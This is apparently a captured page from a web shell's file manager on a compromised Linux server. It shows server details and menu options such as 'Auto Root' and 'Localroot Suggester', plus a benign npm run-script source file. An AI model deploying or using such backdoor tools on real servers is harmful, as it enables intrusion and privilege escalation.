Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
@npmcli /
run-script /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
node-gyp-bin
[ DIR ]
drwxr-xr-x
2024-07-10 10:56
is-server-package.js
314
B
-rw-r--r--
2023-11-23 07:39
is-windows.js
113
B
-rw-r--r--
2023-11-23 07:39
make-spawn-args.js
825
B
-rw-r--r--
2023-11-23 07:39
package-envs.js
699
B
-rw-r--r--
2023-11-23 07:39
run-script-pkg.js
2.68
KB
-rw-r--r--
2023-11-23 07:39
run-script.js
516
B
-rw-r--r--
2023-11-23 07:39
set-path.js
1.47
KB
-rw-r--r--
2023-11-23 07:39
signal-manager.js
820
B
-rw-r--r--
2023-11-23 07:39
validate-options.js
1.18
KB
-rw-r--r--
2023-11-23 07:39
Save
Rename
/* eslint camelcase: "off" */ const setPATH = require('./set-path.js') const { resolve } = require('path') const npm_config_node_gyp = require.resolve('node-gyp/bin/node-gyp.js') const makeSpawnArgs = options => { const { event, path, scriptShell = true, binPaths, env = {}, stdio, cmd, args = [], stdioString, } = options const spawnEnv = setPATH(path, binPaths, { // we need to at least save the PATH environment var ...process.env, ...env, npm_package_json: resolve(path, 'package.json'), npm_lifecycle_event: event, npm_lifecycle_script: cmd, npm_config_node_gyp, }) const spawnOpts = { env: spawnEnv, stdioString, stdio, cwd: path, shell: scriptShell, } return [cmd, args, spawnOpts] } module.exports = makeSpawnArgs